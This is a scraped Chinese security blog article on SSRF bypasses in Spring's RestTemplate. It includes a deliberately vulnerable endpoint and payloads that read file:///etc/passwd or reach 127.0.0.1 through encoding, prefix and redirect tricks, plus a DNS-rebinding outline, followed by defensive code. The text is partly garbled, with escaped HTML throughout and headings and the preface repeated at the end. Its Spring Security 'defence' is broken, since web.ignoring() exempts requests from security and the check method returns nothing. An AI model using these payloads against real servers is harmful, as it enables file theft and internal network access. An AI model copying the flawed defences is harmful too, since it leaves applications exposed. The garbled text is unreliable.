Spring框架下的SSRF漏洞绕过分析与成因<\/h1>

前言<\/h2>
SSRF(Server-Side Request Forgery)服务端请求伪造是一种常见的安全漏洞，攻击者能够利用服务器发起未经授权的内部请求。在Spring框架中，由于其对URL处理的特殊机制，存在一些独特的SSRF绕过技术。<\/p>

环境搭建<\/h2>

为了分析Spring中的SSRF漏洞，需要搭建以下环境：<\/p>

Spring Boot 2.x或更高版本<\/li>
Java 8+<\/li>
测试用的Web应用程序<\/li>

网络监控工具(Wireshark、Burp Suite等)<\/li> <\/ul>

Spring的重定向机制<\/h2>

Spring框架在处理URL重定向时有其独特的行为，这是导致SSRF漏洞可利用的关键点：<\/p>

Spring的RestTemplate<\/code>和WebClient<\/code>等HTTP客户端组件<\/li>
URL解析与标准Java URL<\/code>类的差异<\/li>

重定向处理逻辑的特殊性<\/li>
<\/ol>
漏洞复现<\/h2>
基本SSRF示例<\/h3>
@GetMapping<\/span>(<\/span>"\/ssrf"<\/span>)<\/span>
<\/span><\/span>public<\/span> String ssrf<\/span>(<\/span>@RequestParam<\/span> String url)<\/span> {<\/span>
<\/span><\/span>    RestTemplate restTemplate =<\/span> new<\/span> RestTemplate();<\/span>
<\/span><\/span>    return<\/span> restTemplate.<\/span>getForObject<\/span>(<\/span>url,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这个简单的端点直接使用用户提供的URL发起请求，存在明显的SSRF风险。<\/p>
漏洞分析<\/h2>
Spring与标准Java URL解析的差异<\/h3>
Spring框架的URL处理与标准Java URL<\/code>类存在关键差异：<\/p>


协议处理<\/strong>：<\/p>

Java URL<\/code>类严格遵循RFC规范<\/li>
Spring允许更宽松的协议处理<\/li>
<\/ul>
<\/li>

特殊字符处理<\/strong>：<\/p>

Spring对某些特殊字符(如\<\/code>, {<\/code>, }<\/code>)有特殊处理<\/li>
可能导致URL解析绕过<\/li>
<\/ul>
<\/li>

重定向处理<\/strong>：<\/p>

Spring自动跟随重定向<\/li>
重定向目标可能被精心构造以绕过防护<\/li>
<\/ul>
<\/li>
<\/ol>
绕过技术详解<\/h2>
1. 协议混淆绕过<\/h3>
GET<\/span> \/ssrf?url=file:\/\/\/etc\/passwd HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>防御绕过变种<\/strong>：<\/p>
GET<\/span> \/ssrf?url=FiLe:\/\/\/etc\/passwd HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>GET<\/span> \/ssrf?url=\file:\/\/\/etc\/passwd HTTP\/1.1<\/span>
<\/span><\/span>GET<\/span> \/ssrf?url=file:\/etc\/passwd HTTP\/1.1<\/span>
<\/span><\/span><\/code><\/pre>2. 重定向链绕过<\/h3>
攻击者可以构造一个重定向链：<\/p>

合法域名指向恶意服务器<\/li>
恶意服务器返回重定向到内部服务<\/li>
<\/ol>
\/\/ 恶意服务器代码
<\/span><\/span><\/span><\/span>@GetMapping<\/span>(<\/span>"\/redirect"<\/span>)<\/span>
<\/span><\/span>public<\/span> ResponseEntity<<\/span>Void><\/span> redirect<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> ResponseEntity.<\/span>status<\/span>(<\/span>HttpStatus.<\/span>FOUND<\/span>)<\/span>
<\/span><\/span>            .<\/span>location<\/span>(<\/span>URI.<\/span>create<\/span>(<\/span>"http:\/\/127.0.0.1:8080\/secret"<\/span>))<\/span>
<\/span><\/span>            .<\/span>build<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. URL编码绕过<\/h3>
GET<\/span> \/ssrf?url=http:\/\/%31%32%37%2e%30%2e%30%2e%31:8080\/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>解码后实际访问http:\/\/127.0.0.1:8080\/<\/code><\/p>
4. 特殊前缀绕过<\/h3>
GET<\/span> \/ssrf?url=\/\/\/\/127.0.0.1:8080\/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>GET<\/span> \/ssrf?url=http:\/\/user:pass@127.0.0.1:8080\/ HTTP\/1.1<\/span>
<\/span><\/span><\/code><\/pre>5. DNS重绑定攻击<\/h3>

攻击者控制一个域名，TTL设置很短<\/li>
第一次解析返回合法IP<\/li>
第二次解析返回内部IP<\/li>
<\/ol>
调试分析<\/h2>
关键类分析<\/h3>


org.springframework.web.client.RestTemplate<\/code><\/p>

doExecute()<\/code>方法处理实际请求<\/li>
handleResponse()<\/code>处理响应和重定向<\/li>
<\/ul>
<\/li>

java.net.URL<\/code><\/p>

Spring使用自定义的URI\/URL处理逻辑<\/li>
与标准Java实现存在差异<\/li>
<\/ul>
<\/li>
<\/ol>
重定向处理流程<\/h3>

客户端发起初始请求<\/li>
服务器返回3xx重定向响应<\/li>
Spring自动提取Location<\/code>头<\/li>
对重定向URL进行解析<\/li>
发起新的请求到重定向目标<\/li>
<\/ol>
防御措施<\/h2>
1. 输入验证<\/h3>
private<\/span> boolean<\/span> isValidUrl<\/span>(<\/span>String url)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        URI uri =<\/span> new<\/span> URI(<\/span>url);<\/span>
<\/span><\/span>        String host =<\/span> uri.<\/span>getHost<\/span>();<\/span>
<\/span><\/span>        \/\/ 检查协议
<\/span><\/span><\/span><\/span>        if<\/span> (!<\/span>"https"<\/span>.<\/span>equalsIgnoreCase<\/span>(<\/span>uri.<\/span>getScheme<\/span>()))<\/span> {<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ 检查域名
<\/span><\/span><\/span><\/span>        if<\/span> (!<\/span>host.<\/span>endsWith<\/span>(<\/span>".example.com"<\/span>))<\/span> {<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ 检查IP地址
<\/span><\/span><\/span><\/span>        if<\/span> (<\/span>isInternalIp(<\/span>host))<\/span> {<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>URISyntaxException e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 使用白名单<\/h3>
private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> ALLOWED_DOMAINS =<\/span> Set.<\/span>of<\/span>(<\/span>
<\/span><\/span>    "api.example.com"<\/span>,<\/span> 
<\/span><\/span>    "cdn.example.com"<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> boolean<\/span> isAllowedDomain<\/span>(<\/span>String url)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        String host =<\/span> new<\/span> URI(<\/span>url).<\/span>getHost<\/span>();<\/span>
<\/span><\/span>        return<\/span> ALLOWED_DOMAINS.<\/span>contains<\/span>(<\/span>host);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>URISyntaxException e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 禁用重定向<\/h3>
RestTemplate restTemplate =<\/span> new<\/span> RestTemplate();<\/span>
<\/span><\/span>restTemplate.<\/span>setRequestFactory<\/span>(<\/span>new<\/span> HttpComponentsClientHttpRequestFactory());<\/span>
<\/span><\/span>HttpClient client =<\/span> HttpClientBuilder.<\/span>create<\/span>()<\/span>
<\/span><\/span>    .<\/span>disableRedirectHandling<\/span>()<\/span>
<\/span><\/span>    .<\/span>build<\/span>();<\/span>
<\/span><\/span>((<\/span>HttpComponentsClientHttpRequestFactory)<\/span> restTemplate.<\/span>getRequestFactory<\/span>())<\/span>
<\/span><\/span>    .<\/span>setHttpClient<\/span>(<\/span>client);<\/span>
<\/span><\/span><\/code><\/pre>4. 使用Spring Security<\/h3>
@Bean<\/span>
<\/span><\/span>public<\/span> WebSecurityCustomizer webSecurityCustomizer<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> (<\/span>web)<\/span> -><\/span> web.<\/span>ignoring<\/span>()<\/span>
<\/span><\/span>        .<\/span>requestMatchers<\/span>(<\/span>this<\/span>::<\/span>isSafeUrl);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> boolean<\/span> isSafeUrl<\/span>(<\/span>HttpServletRequest request)<\/span> {<\/span>
<\/span><\/span>    \/\/ 实现URL安全检查逻辑
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
Spring框架中的SSRF漏洞主要源于：<\/p>

URL解析与标准Java实现的差异<\/li>
自动重定向机制<\/li>
宽松的协议和特殊字符处理<\/li>
<\/ol>
防御SSRF需要多层防护：<\/p>

严格的输入验证<\/li>
白名单机制<\/li>
禁用不必要的重定向<\/li>
使用安全组件进行防护<\/li>
<\/ul>
开发者应当充分了解Spring框架的URL处理机制，避免直接使用用户提供的URL发起请求，同时实施深度防御策略来缓解SSRF风险。<\/p>

Spring框架下的SSRF漏洞绕过分析与成因<\/h1>

前言<\/h2> SSRF(Server-Side Request Forgery)服务端请求伪造是一种常见的安全漏洞，攻击者能够利用服务器发起未经授权的内部请求。在Spring框架中，由于其对URL处理的特殊机制，存在一些独特的SSRF绕过技术。<\/p>

漏洞复现<\/h2>

漏洞分析<\/h2>

绕过技术详解<\/h2>

调试分析<\/h2>

防御措施<\/h2>

前言<\/h2>
SSRF(Server-Side Request Forgery)服务端请求伪造是一种常见的安全漏洞，攻击者能够利用服务器发起未经授权的内部请求。在Spring框架中，由于其对URL处理的特殊机制，存在一些独特的SSRF绕过技术。<\/p>